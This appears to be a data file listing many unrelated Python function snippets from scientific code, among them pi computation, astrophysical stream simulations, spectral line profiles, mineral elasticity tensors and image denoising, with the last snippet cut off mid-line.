"def pi_chudnovsky_bs(digits):\n C = 640320\n C3_OVER_24 = C**3 // 24\n def bs(a, b):\n \"\"\"\n Computes the terms for binary splitting the Chudnovsky infinite series\n\n a(a) = +/- (13591409 + 545140134*a)\n p(a) = (6*a-5)*(2*a-1)*(6*a-1)\n b(a) = 1\n q(a) = a*a*a*C3_OVER_24\n\n returns P(a,b), Q(a,b) and T(a,b)\n \"\"\"\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab\n # how many terms to compute\n DIGITS_PER_TERM = math.log10(C3_OVER_24/6/2/6)\n N = int(digits/DIGITS_PER_TERM + 1)\n # Calclate P(0,N) and Q(0,N)\n P, Q, T = bs(0, N)\n one_squared = mpz(10)**(2*digits)\n sqrtC = gmpy2.isqrt(10005*one_squared)\n return (Q*426880*sqrtC) // T", "def collnud(Te,nev,v):\n return vcrit(Te)/2./v**3*collnu(Te,nev)", "def generate_variations(seed=425, th=150):\n \n # impact parameters\n M = 1e8*u.Msun\n B0 = 19.85*u.kpc\n\n V = 220*u.km/u.s\n phi = coord.Angle(0*u.deg)\n theta = coord.Angle(th*u.deg)\n Tenc = 0.01*u.Gyr\n T = 0.5*u.Gyr\n dt = 0.05*u.Myr\n rs = 0*u.pc\n potential_perturb = 1\n \n # potential parameters (log halo)\n potential = 3\n Vh = 220*u.km/u.s\n q = 1*u.Unit(1)\n rhalo = 20*u.pc\n par_pot = np.array([Vh.si.value, q.value, rhalo.si.value])\n \n # setup tube\n Nstar = 1400\n wx = 30*u.kpc\n wy = 0*u.pc\n wz = 0*u.pc\n sx = 0*u.km/u.s\n \n np.random.seed(seed)\n observer = {'z_sun': 27.*u.pc, 'galcen_distance': 8.3*u.kpc, 'roll': 60*u.deg, 'galcen_coord': coord.SkyCoord(ra=300*u.deg, dec=-90*u.deg, frame='icrs')}\n vobs = {'vcirc': 220*u.km/u.s, 'vlsr': [0, 0, 0]*u.km/u.s}\n wangle = 180*u.deg\n \n xphi = np.linspace(-0.3*np.pi,0.3*np.pi, Nstar)\n xphi0 = np.linspace(-0.1*np.pi, 0.1*np.pi, 1000)\n xphi1 = np.linspace(-0.28*np.pi, -0.1*np.pi, 200)\n xphi2 = np.linspace(0.1*np.pi, 0.32*np.pi, 200)\n xphi = np.concatenate([xphi1, xphi0, xphi2])\n \n Bs = 20*u.kpc\n xr = Bs + np.random.randn(Nstar)*0.0*u.kpc\n x = np.sin(xphi) * xr\n y = np.cos(xphi) * xr\n z = x * 0\n vx = -np.cos(xphi) * Vh\n vy = np.sin(xphi) * Vh\n vz = vx * 0\n ienc = np.argmin(np.abs(x))\n \n farray = np.array([0.1, 0.3, 0.5, 1, 2, 3, 10])\n farray = np.array([0.3,0.5,0.8,0.9,1,1.1,1.2,2,3])\n \n for e, f in enumerate(farray):\n # unperturbed stream\n par_perturb = np.array([0*M.si.value, 0., 0., 0.])\n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B0.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T*f).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream0 = {}\n stream0['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream0['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal0 = coord.Galactocentric(stream0['x'], **observer)\n xeq0 = xgal0.transform_to(coord.ICRS)\n veq0_ = gc.vgal_to_hel(xeq0, stream0['v'], **vobs)\n veq0 = [None] * 3\n veq0[0] = veq0_[0].to(u.mas/u.yr)\n veq0[1] = veq0_[1].to(u.mas/u.yr)\n veq0[2] = veq0_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n R = 
find_greatcircle(xeq0.ra.deg[::10], xeq0.dec.deg[::10])\n xi0, eta0 = myutils.rotate_angles(xeq0.ra, xeq0.dec, R)\n xi0 = coord.Angle(xi0*u.deg)\n \n # place gap at xi~0\n xioff = xi0[ienc]\n xi0 -= xioff\n \n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T*f).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_T_{:.1f}.pkl'.format(th, f), 'wb'))\n \n # unperturbed stream\n par_perturb = np.array([0*M.si.value, 0., 0., 0.])\n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B0.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream0 = {}\n stream0['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream0['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal0 = coord.Galactocentric(stream0['x'], **observer)\n xeq0 = xgal0.transform_to(coord.ICRS)\n veq0_ = gc.vgal_to_hel(xeq0, stream0['v'], **vobs)\n veq0 = [None] * 3\n veq0[0] = veq0_[0].to(u.mas/u.yr)\n veq0[1] = veq0_[1].to(u.mas/u.yr)\n veq0[2] = veq0_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n R = find_greatcircle(xeq0.ra.deg[::10], xeq0.dec.deg[::10])\n xi0, eta0 = myutils.rotate_angles(xeq0.ra, xeq0.dec, R)\n xi0 = coord.Angle(xi0*u.deg)\n \n # place gap at xi~0\n xioff = xi0[ienc]\n xi0 -= xioff\n \n for e, f in enumerate(farray):\n par_perturb = np.array([f*M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, 
open('../data/variations/vary_th{:03d}_M_{:.1f}.pkl'.format(th, f), 'wb'))\n \n for e, f in enumerate(farray):\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB*f + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_B_{:.1f}.pkl'.format(th, f), 'wb'))\n \n theta0 = theta\n V0 = V\n \n for e, f in enumerate(farray):\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n vpar = Vh + np.cos(theta0.rad)*V0\n vperp = np.sin(theta0.rad)*V0\n vpar_scaled = vpar*f\n vperp_scaled = vperp*f\n \n V = np.sqrt((vpar_scaled-Vh)**2 + vperp_scaled**2)\n theta = coord.Angle(np.arctan2(vperp_scaled, vpar_scaled-Vh))\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_V_{:.1f}.pkl'.format(th, f), 'wb'))", "def euc_dist(self, squared=True):", "def v_multiplier(self):\n return (4./3)*np.pi*(self.bins[:, 1]/2)**3", "def h2_potential(dist: float) -> float:\n pass", "def colii_Goldston(mu,Ti,Te,nev,Zi=None):\n if Zi is None:\n Zi = 1.;\n d1 = nev*Zi**4*eV2J**2.5*lnlambda(Te,nev)\n d2 = 12.*np.pi**(1.5)*epsilon**2*(mp*mu)**0.5*Ti**1.5\n return d1/d2", "def compute_w(self):\n self.pinvX = np.linalg.pinv(self.X)\n return np.dot(self.pinvX, self.y)", "def generate_probabilities(self):\n k = 1\n v= 10\n for g in self.class_probabilities:\n curr_list = self.class_probabilities[g]\n for l in range(0,28):\n for w in range(0,28):\n total = float(curr_list[l][w][0] + curr_list[l][w][1] + curr_list[l][w][2])\n curr_list[l][w][0] = (float(curr_list[l][w][0])+k)/(total + k*v) \n curr_list[l][w][1] = 
(float(curr_list[l][w][1])+k)/(total + k*v)\n curr_list[l][w][2] = (float(curr_list[l][w][2])+k)/(total + k*v)\n curr_list[l][w][3] = curr_list[l][w][0] + curr_list[l][w][1] + curr_list[l][w][2]", "def _Voigt(self, x, g_fwhm, l_fwhm, semi_amp=1, center=0.0):\n\t sigma = g_fwhm / np.sqrt(2.0 * np.log(2.0))\n\n\t return semi_amp * np.real(wofz(((x-center) + 1j*l_fwhm)/(sigma*np.sqrt(2.0)))) / (sigma * np.sqrt(2.0*np.pi))", "def _Voigt(self, x, g_fwhm, l_fwhm, semi_amp=1, center=0.0):\n\t sigma = g_fwhm / np.sqrt(2.0 * np.log(2.0))\n\n\t return semi_amp * np.real(wofz(((x-center) + 1j*l_fwhm)/(sigma*np.sqrt(2.0)))) / (sigma * np.sqrt(2.0*np.pi))", "def solar_ppa():\n per_kwh = 0.196 # [$/kWh]\n\n return per_kwh", "def stdProbabilityNorm(self):\n return 0.5", "def pi_chudnovsky(one):\n k = 1\n a_k = one\n a_sum = one\n b_sum = 0\n C = 640320\n C3_OVER_24 = C**3 // 24\n while 1:\n a_k *= -(6*k-5)*(2*k-1)*(6*k-1)\n a_k //= k*k*k*C3_OVER_24\n a_sum += a_k\n b_sum += k * a_k\n k += 1\n if a_k == 0:\n break\n total = 13591409*a_sum + 545140134*b_sum\n pi = (426880*sqrt(10005*one, one)*one) // total\n return pi", "def strain_distribution(self,na_z,phi):\r\n\t\treturn (self.mesh_center - na_z)*phi", "def Seljak04(self,dc,nu):\n mass_non_linear = (np.argmin((self.sigmaM-dc)**2.).to(self.Msunh)).value\n Mh = (self.M.to(self.Msunh)).value\n x = Mh/self.mass_non_linear\n if len(self.bias_par.keys()) == 0:\n a = 0.53\n b = 0.39\n c = 0.45\n d = 0.13\n e = 40.\n f = 5e-4\n g = 1.5\n else:\n a = self.bias_par['a']\n b = self.bias_par['b']\n c = self.bias_par['c']\n d = self.bias_par['d']\n e = self.bias_par['e']\n f = self.bias_par['f']\n g = self.bias_par['g']\n return a + b*x**c + d/(e*x+1.) + f*x**g", "def compute_windchill(t,v):\n a = 35.74\n b = 0.6215\n c = 35.75\n d = 0.4275\n v16 = v**0.16\n wci = a+(b*t)-(c*v16)+(d*t*v16)\n return wci", "def kepler_U(mu, dt, ro, vro, inv_a, nMax=500):\n\n \"\"\"\n ratios = []\n # For some parabolic comets, using some initial values improves the convergence\n for x in [sqrt(mu)*abs(inv_a)*dt]: #+ LINEAR_GRID :\n converged, result, ratio = kepler_U_prv(mu, x , dt, ro, vro, inv_a, nMax=1000)\n if converged:\n return result \n else :\n ratios.append(str(ratio))\n logger.error(f\"Number max iteration reached but not converged, ratios: {','.join(ratios)}\")\n return result \n \"\"\"\n x = sqrt(mu)*abs(inv_a)*dt\n return myastro.kepler_u.kepler_U(mu, x, dt, ro, vro, inv_a, nMax)", "def potential(Walker):\n V = 0.0\n r_cut = 1.0e-4\n # e-e\n for i in range(Walker.Ne-1):\n for j in range(i+1,Walker.Ne):\n r = sqrt(sum((Walker.Re[i]-Walker.Re[j])**2))\n V += 1.0/max(r_cut,r)\n\n # e-Ion\n for i in range(Walker.Ne):\n for j in range(Walker.Nn):\n r = sqrt(sum((Walker.Re[i]-Walker.Rn[j])**2))\n V -= Walker.Zn[j]/max(r_cut,r)\n\n # Ion-Ion\n for i in range(Walker.Nn-1):\n for j in range(i+1,Walker.Nn):\n r = sqrt(sum((Walker.Rn[i]-Walker.Rn[j])**2))\n V += 1.0/max(r_cut,r)\n\n return V", "def findVWSP(self):\n num=0\n den=0\n ban=False\n for el in self.TL:\n if datetime.fromtimestamp(el.TS) > (datetime.now()-timedelta(minutes = 15)):\n ban=True\n num+=el.Price * el.NoSh\n den+= el.NoSh \n if ban:\n if den!=0:\n return num/den\n else:\n raise BaseException(\"Oops! 
the vwsp cannot be computed.\")\n else:\n return 0", "def prob_V(self, V_array, mu, sd, v):\n from scipy.integrate import quad\n step = lambda x: 0.5 * (np.sign(x) + 1) # Heaviside step function\n red = lambda V: (V - mu) / sd # reduced voltage\n P_integrand = lambda u: step(u - red(self.V_r)) * np.exp(u**2) # integrand\n \n low = red(V_r)\n up = (self.theta - mu) / sd\n integral = quad(P_integrand, low, up)[0]\n \n P_V_array = 2 * v * self.tau_m * 1e-3 / sd * np.exp(- ((V_array - self.E_L) - mu)**2 / sd**2) * integral\n return step(-(V_array - self.E_L) + self.theta) * P_V_array", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def jensen_shannon_div_bern(p, w=None):\n\n n = len(p)\n p = np.array(p)\n\n # make weight matrix sum to 1\n if w is None:\n w = np.ones(n)\n w = (np.array(w) / np.sum(w)).reshape((1, n))\n\n p_sum = np.dot(w, p)\n entropy_of_sum = scipy.stats.bernoulli(p_sum).entropy()\n\n sum_of_entropies = np.dot(w, scipy.stats.bernoulli(p).entropy())\n\n return entropy_of_sum - sum_of_entropies", "def muscovite():\n\n rho = 2834.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 181.; C[0,1] = 48.8; C[0,2] = 25.6; C[0,3] = 0.; C[0,4] = -14.2; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 178.4; C[1,2] = 21.2; C[1,3] = 0.; C[1,4] = 1.1; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 58.6; C[2,3] = 0.; C[2,4] = 1.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 16.5; C[3,4] = 0.; C[3,5] = -5.2\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 19.5; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 72.\n\n return C, rho", "def hornblende():\n\n rho = 3200.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 116.; C[0,1] = 49.9; C[0,2] = 61.4; C[0,3] = 0.; C[0,4] = 4.3; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 159.7; C[1,2] = 65.5; C[1,3] = 0.; C[1,4] = -2.5; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 191.6; C[2,3] = 0.; C[2,4] = 10.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 57.4; C[3,4] = 0.; C[3,5] = -6.2\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.8; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 36.8\n\n return C, rho", "def lorentzian(mu, wid, x): \n return np.ones(len(x) ) / (1 + ( (x - mu) / (0.5 * wid) )**2)", "def _compute_likelihood_variables(self):\r\n #At this point get the hessian matrix (or vector as W is diagonal)\r\n self.W = -self.noise_model.d2logpdf_df2(self.f_hat, self.data, extra_data=self.extra_data)\r\n\r\n if not self.noise_model.log_concave:\r\n i = self.W < 1e-6\r\n if np.any(i):\r\n warnings.warn('truncating non log-concave likelihood curvature')\r\n # FIXME-HACK: This is a hack since GPy can't handle negative variances which can occur\r\n self.W[i] = 1e-6\r\n\r\n self.W12BiW12, self.ln_B_det = self._compute_B_statistics(self.K, self.W, np.eye(self.N))\r\n\r\n self.Ki_f = self.Ki_f\r\n self.f_Ki_f = np.dot(self.f_hat.T, self.Ki_f)\r\n self.Ki_W_i = self.K - mdot(self.K, self.W12BiW12, self.K)", "def width_v_v_v(model: SingleRhNeutrinoModel, genv: Generation):\n mx = model.mx\n u = 0.5 * np.tan(2 * model.theta)\n w = parameters.GF**2 * mx**5 / (768 * np.pi**3) * u**2\n pre = 2 if genv == model.gen else 1.0\n return pre * w", "def genus(self):\n return 1 - self.euler_characteristic() // 2", "def betaW(self):\n 
if self.maCruise > 1:\n return 0\n else:\n return sqrt(1 - self.maCruise**2)", "def diff_comoving_volume(self, z):\n \n d_h_0 = self.hubble_distance_z(0.0)\n d_m = self.comoving_distance_transverse(z)\n ez = self.e_z(z)\n dvc = d_h_0*d_m**2./ez\n return(dvc)", "def distribution(self):\n \n #external_distribution serves both the purpose of external setting of distribution and the caching of distribution()\n if self.external_distribution:\n return self.external_distribution_array;\n else:\n energy_vector = []\n superset = self.generate_superset(0) \n \n for i in superset:\n state = self.ket(i)\n \n norm_squared = np.dot(state.T, state)\n \n if norm_squared > 0: #zero is appended at the end\n energy = np.dot(state.T, np.dot( self.epsilon, state))\n interaction = np.dot(state.T, np.dot( self.u, state))/2.0 #divide by two. Otherwise, <l r| U |l r > = U_LR + U_RL = 2U\n #print state, np.dot(self.u, state) \n #print interaction\n energy_vector.append( energy + interaction )\n \n energy_vector.insert(0, 0.0) \n probability = np.exp( np.multiply(-self.beta, energy_vector)) \n probability /= probability.sum() \n return probability", "def computeW(self):\n E = np.where(self.v > 0, 1, -1)\n # theshold the connections to only -1,1\n binary_weights = np.where(self.c > 0, 1, self.c)\n binary_weights = np.where(binary_weights < 0, -1, binary_weights)\n W = np.sum(binary_weights * np.dot(E.reshape(-1,1), E.reshape(1,-1))) # W = C * E * E\n self.W = W\n if np.sum(binary_weights) != 0:\n self.W = self.W / np.sum(binary_weights) # W / W*\n return self.W", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.k = 1.0\n self.type = 'Weibull'\n self.distType = 'Continuous'\n self.low = 0.0\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def Wv2(z, k, c_M=0):\n k *= 0.6763 # 1/Mpc\n c = 299792458/1000 # km/s\n W = -(1 - c/(Hcal(z)*chi(z)) + alpha_M(z, c_M)/2)*f(z)*H(z)/(1+z)*1/k**2\n W *= 1/c\n return W", "def vxc_PW92(n):\n eps = 1E-9*n # ???????\n SMALL = 1E-90\n if n < SMALL:\n return 0.0\n else:\n return exc_PW92(n) + n*exc_PW92(n,der=1)", "def _vce(self):\n sum = 0.0\n for sail in self.sails:\n cl2 = sail.cl(self.awa)**2\n cd2 = sail.cd(self.awa)**2\n sum += sail.area * sail.vce * sail.bk * np.sqrt(cl2+cd2)\n self._area()\n deltaCH = 0 if self.sails[1].up!=True else (1-self.ftj)*0.05*self.sails[1].IG\n Zce = sum/(self.area*np.sqrt(self.cl**2+self.cd**2)) - deltaCH\n return (Zce*(1-0.203*(1-self.flat)-0.451*(1-self.flat)*(1-self.fractionality)))", "def potega_it(podst, wykladnik):\n wynik = 1\n # i = 1\n # while i <= wykladnik:\n for i in range(wykladnik):\n wynik = wynik * podst\n # i = i + 1\n return wynik", "def u(self, k, m, z):\n result = self.ProfNFW.nfw(k, m, z) * self.Ngal(m) / self.nBarGal(1./(1.+z))\n return result", "def trueDiversity(blau):\n\n return - np.sqrt(1/(blau-1))", "def chauvenet_criterion(npoints, p=0.5):\n \n \n return np.abs(stats.norm.ppf(p/(2.*npoints), loc=0., scale=1.))", "def excess_noise_PDF(y,base_noise,Poisson=False):\n \n y, base_noise = array(y), array(base_noise)\n ymn = mean(y)\n yvar = var(y)\n base_var = base_noise**2\n x_guess = sqrt(yvar - mean(base_var)) if yvar > mean(base_var) else 0.0\n \n def log_like(mn,x_noise,log_norm_fac):\n x_var = x_noise**2\n var = x_var + base_var\n terms = -log(2*pi*var)/2 - (y - mn)**2/2/var\n return sum(terms) + log_norm_fac\n \n #initial pass at a normalization factor - use peak value\n def neg_like(x):\n mn,x_noise= x\n 
return -log_like(mn,x_noise,0.0)\n result = minimize(neg_like, [ymn,x_guess], method='Nelder-Mead')\n log_norm_fac = result.fun\n mn_pk, x_noise_pk = result.x\n \n def like(mn,x_noise):\n return exp(log_like(mn, x_noise, log_norm_fac))\n \n def xmn_like(xnorm):\n constrained_like = lambda mn: like(mn, xnorm*mn)\n result = quad(constrained_like, mn_pk, inf)[0]\n result += -quad(constrained_like, mn_pk, 0.0)[0]\n return result\n \n xmn_pk = x_noise_pk/mn_pk\n result = minimize(lambda x: -xmn_like(x), xmn_pk, method='Nelder-Mead')\n xmn_pk = result.x[0]\n# f_pk = -result.fun\n if xmn_pk < 0.0: xmn_pk = 0.0\n# width = 1.0/f_pk\n# area = pu.gauss_integrate(xmn_like, xmn_pk, 0.0, inf, sigma_guess=width)\n area = quad(xmn_like, xmn_pk, inf)[0]\n area += -quad(xmn_like, xmn_pk, 0.0)[0]\n pdf = lambda x: xmn_like(x)/area if x >= 0.0 else 0.0\n# if pdf(xmn_pk) <= 0.0: pdb.set_trace()\n return pdf, xmn_pk", "def _denoise_tv_chambolle_nd(image, weight=0.1, eps=2.e-4, n_iter_max=200,\n xp=None):\n\n ndim = image.ndim\n p = xp.zeros((image.ndim, ) + image.shape, dtype=image.dtype)\n g = xp.zeros_like(p)\n d = xp.zeros_like(image)\n i = 0\n slices_g = [slice(None), ] * (ndim + 1)\n slices_d = [slice(None), ] * ndim\n slices_p = [slice(None), ] * (ndim + 1)\n while i < n_iter_max:\n if i > 0:\n # d will be the (negative) divergence of p\n d = -p.sum(0)\n for ax in range(ndim):\n slices_d[ax] = slice(1, None)\n slices_p[ax+1] = slice(0, -1)\n slices_p[0] = ax\n d[tuple(slices_d)] += p[tuple(slices_p)]\n slices_d[ax] = slice(None)\n slices_p[ax+1] = slice(None)\n out = image + d\n E = (d * d).sum()\n else:\n out = image\n E = 0.\n\n # g stores the gradients of out along each axis\n # e.g. g[0] is the first order finite difference along axis 0\n for ax in range(ndim):\n slices_g[ax+1] = slice(0, -1)\n slices_g[0] = ax\n if xp == np:\n g[tuple(slices_g)] = xp.diff(out, axis=ax)\n else:\n g[tuple(slices_g)] = diff(out, axis=ax)\n slices_g[ax+1] = slice(None)\n\n norm = (g * g).sum(axis=0, keepdims=True)\n xp.sqrt(norm, out=norm)\n E += weight * norm.sum()\n tau = 1. / (2.*ndim)\n norm *= tau / weight\n norm += 1.\n p -= tau * g\n p /= norm\n E /= float(image.size)\n if i == 0:\n E_init = E\n E_previous = E\n else:\n if abs(E_previous - E) < eps * E_init:\n break\n else:\n E_previous = E\n i += 1\n return out", "def compute_mixing_coefficients_bot(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n\n v_upts = TTTW_func.v2u(self.v)\n\n self.sigma_bot = []\n self.Kv0 = np.zeros([Ly,N+1])\n self.Kt0 = np.zeros([Ly,N+1])\n for j in range(Ly):\n # turbulent velocity sclaes with buoyancy effects neglected\n ustar2 = self.r_D[j] * np.sqrt(self.u[j,0]**2 + v_upts[j,0]**2)\n wm = self.vonKar * np.sqrt(ustar2)\n ws = wm\n \n for k in range(1,N):\n k_w = k\n k_r = k - 1\n\n if k_w < self.kbl[j]: # NEED Zob\n sigma = np.min( [ ((z_u_w[j,k_w] - z_u_w[j,0] + self.Zob) / (self.hbbl[j] + self.Zob)),1.])\n if j ==1:\n self.sigma_bot.append(sigma)\n a1 = sigma - 2.\n a2 = 3. - 2.*sigma\n a3 = sigma - 1.\n\n self.Kv0[j,k_w] = wm * self.hbbl[j] * ( sigma * (1. + sigma * ( a1 + a2*self.Gm1_bot[j]+a3*self.dGm1_dS_bot[j]))) \n self.Kt0[j,k_w] = ws * self.hbbl[j] * ( sigma * (1. 
+ sigma * ( a1 + a2*self.Gt1_bot[j]+a3*self.dGt1_dS_bot[j])))", "def posteriorDistribution(x,z,beta,sigma2):\r\n ### TODO: Write your code here\r\n mu = 0\r\n Cov = 0\r\n\r\n x_s = []\r\n for i in np.linspace(-1 , 1 , 150):\r\n for j in np.linspace(-1 , 1 , 150):\r\n x_s.append([i,j])\r\n x_s = np.array(x_s)\r\n\r\n X = []\r\n for i in x:\r\n j = [1,i[0]]\r\n X.append(j)\r\n X = np.array(X)\r\n\r\n common = np.matmul( X.T , X) + np.identity(2) * sigma2/beta\r\n common = np.linalg.inv(common)\r\n Cov = common * sigma2\r\n mu = np.matmul(common , np.matmul (X.T , z) )\r\n mu = mu.flatten()\r\n print(\"X.shape: \" , X.shape)\r\n print(\"z.shape: \",z.shape)\r\n print(\"Cov.shape\" , Cov.shape)\r\n print(\"mu.shape: \",mu.shape)\r\n density = util.density_Gaussian(mu , Cov , x_s).reshape(150 , 150 ).T\r\n print(\"density.shape\",density.shape)\r\n X,Y = np.meshgrid( np.linspace(-1,1,150) , np.linspace(-1,1,150) )\r\n\r\n \r\n\r\n plt.contour( X , Y , np.reshape(density , (150, 150 )))\r\n plt.plot(-0.1 , -0.5 , marker = 'o' 